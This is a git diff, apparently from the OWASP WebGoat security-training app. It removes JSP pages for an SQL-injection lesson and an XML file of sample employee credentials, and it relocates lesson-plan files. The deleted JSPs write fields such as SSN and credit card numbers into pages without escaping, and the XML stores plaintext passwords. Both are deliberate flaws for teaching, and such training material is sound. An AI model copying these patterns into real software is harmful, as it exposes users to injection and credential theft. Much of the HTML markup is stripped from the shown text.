deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/RoleBasedAccessControl/images/orgChart.jpg b/src/main/webapp/lessons/RoleBasedAccessControl/images/orgChart.jpg
deleted file mode 100644
index 016c0d162..000000000
Binary files a/src/main/webapp/lessons/RoleBasedAccessControl/images/orgChart.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/EditProfile.jsp b/src/main/webapp/lessons/SQLInjection/EditProfile.jsp
deleted file mode 100644
index 38ca58086..000000000
--- a/src/main/webapp/lessons/SQLInjection/EditProfile.jsp
+++ /dev/null
@@ -1,133 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("SQLInjection.Employee");
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name: - - - - Last Name: - - -
- Street: - - - - City/State: - - -
- Phone: - - - - Start Date: - - -
- SSN: - - - - Salary: - - -
- Credit Card: - - - - Credit Card Limit: - - -
- Comments: - - - - Manager: - - -
- Disciplinary Explanation: - - - - Disciplinary Action Dates: - - -
-
-
- - - - - - - - -
- - - - - - - -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/ListStaff.jsp b/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
deleted file mode 100644
index 5b6256e71..000000000
--- a/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
+++ /dev/null
@@ -1,57 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- int myUserId = webSession.getUserIdInLesson();
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
-
-
-
-

Select from the list below

- -
- - - - - -
-
-
- <% - if (webSession.isAuthorizedInLesson(myUserId, SQLInjection.CREATEPROFILE_ACTION)) - { - %> -
- <% - } - %> - <% - if (webSession.isAuthorizedInLesson(myUserId, SQLInjection.DELETEPROFILE_ACTION)) - { - %> -
- <% - } - %> -
- -
- -
-
diff --git a/src/main/webapp/lessons/SQLInjection/Login.jsp b/src/main/webapp/lessons/SQLInjection/Login.jsp
deleted file mode 100644
index a88d694db..000000000
--- a/src/main/webapp/lessons/SQLInjection/Login.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-
-
- <% - WebSession webSession = ((WebSession)session.getAttribute("websession")); - %> -
- -
- -
- -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/SQLInjection.css b/src/main/webapp/lessons/SQLInjection/SQLInjection.css
deleted file mode 100644
index 177129117..000000000
--- a/src/main/webapp/lessons/SQLInjection/SQLInjection.css
+++ /dev/null
@@ -1,14 +0,0 @@
-#lesson_wrapper {height: 435px;width: 500px;}
-#lesson_header {background-image: url(lessons/SQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
-.lesson_workspace {background-image: url(lessons/SQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
-.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
-#lesson_buttons_bottom {height: 20px;width: 460px;}
-#lesson_b_b_left {width: 300px;float: left;}
-#lesson_b_b_right input {width: 100px;float: right;}
-.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
-.lesson_workspace { }
-.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
-.lesson_text_db {color: #0066FF}
-#lesson_login {background-image: url(lessons/SQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
-#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
-#lesson_search {background-image: url(lessons/SQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/src/main/webapp/lessons/SQLInjection/SQLInjection.jsp b/src/main/webapp/lessons/SQLInjection/SQLInjection.jsp
deleted file mode 100644
index 51dbc4f3f..000000000
--- a/src/main/webapp/lessons/SQLInjection/SQLInjection.jsp
+++ /dev/null
@@ -1,26 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-
-<%
-WebSession webSession = ((WebSession)session.getAttribute("websession"));
-SQLInjection currentLesson = (SQLInjection) webSession.getCurrentLesson();
-%>
-
-
-
- <%
- String subViewPage = currentLesson.getPage(webSession);
- if (subViewPage != null)
- {
- //System.out.println("Including sub view page: " + subViewPage);
- %>
-
- <%
- }
- %>
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/SearchStaff.jsp b/src/main/webapp/lessons/SQLInjection/SearchStaff.jsp
deleted file mode 100644
index cf86d0dad..000000000
--- a/src/main/webapp/lessons/SQLInjection/SearchStaff.jsp
+++ /dev/null
@@ -1,22 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp b/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp
deleted file mode 100644
index a05a0bc39..000000000
--- a/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp
+++ /dev/null
@@ -1,154 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("SQLInjection." + SQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
-// int myUserId = getIntSessionAttribute(webSession, "SQLInjection." + SQLInjection.USER_ID);
-%>
-
Welcome Back <%=webSession.getUserNameInLesson()%>
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- First Name:
-
- <%=employee.getFirstName()%>
-
- Last Name:
-
- <%=employee.getLastName()%>
-
- Street:
-
- <%=employee.getAddress1()%>
-
- City/State:
-
- <%=employee.getAddress2()%>
-
- Phone:
-
- <%=employee.getPhoneNumber()%>
-
- Start Date:
-
- <%=employee.getStartDate()%>
-
- SSN:
-
- <%=employee.getSsn()%>
-
- Salary:
-
- <%=employee.getSalary()%>
-
- Credit Card:
-
- <%=employee.getCcn()%>
-
- Credit Card Limit:
-
- <%=employee.getCcnLimit()%>
-
- Comments:
-
- <%=employee.getPersonalDescription()%>
-
- Manager:
-
- <%=employee.getManager()%>
-
- Disciplinary Explanation:
-
- <%=employee.getDisciplinaryActionNotes()%>
-
- Disciplinary Action Dates:
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
- - - - - - - - -
- <%
- if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), SQLInjection.LISTSTAFF_ACTION))
- {
- %>
-
- - -
- <%
- }
- %>
-
- <%
- if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), SQLInjection.EDITPROFILE_ACTION))
- {
- %>
-
- - -
- <%
- }
- %>
-
- <%
- if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), SQLInjection.DELETEPROFILE_ACTION))
- {
- %>
-
- - -
- <%
- }
- %>
-
  -
- -
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/error.jsp b/src/main/webapp/lessons/SQLInjection/error.jsp
deleted file mode 100644
index 5af0a45dc..000000000
--- a/src/main/webapp/lessons/SQLInjection/error.jsp
+++ /dev/null
@@ -1,3 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- errorPage="" %>
-


An error has occurred.
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_header.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_menu.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_workspace.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/XPATHInjection/EmployeesData.xml b/src/main/webapp/lessons/XPATHInjection/EmployeesData.xml
deleted file mode 100644
index e82f74989..000000000
--- a/src/main/webapp/lessons/XPATHInjection/EmployeesData.xml
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
-
- Mike
- 11123
- test123
- 468100
-
-
- John
- 63458
- myownpass
- 559833
-
-
- Sarah
- 23363
- secret
- 84000
-
-
diff --git a/src/main/webapp/lesson_plans/en/SqlStringInjection.html b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection.html
similarity index 100%
rename from src/main/webapp/lesson_plans/en/SqlStringInjection.html
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection.html
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/colorschememapping.xml
similarity index 100%
rename from src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/colorschememapping.xml
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/filelist.xml b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/filelist.xml
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/filelist.xml
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/filelist.xml
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image001.png
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image001.png
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image003.png
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image003.png
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image005.jpg
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image005.jpg
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image006.jpg
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image006.jpg
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/themedata.thmx
similarity index 100%
rename from src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/themedata.thmx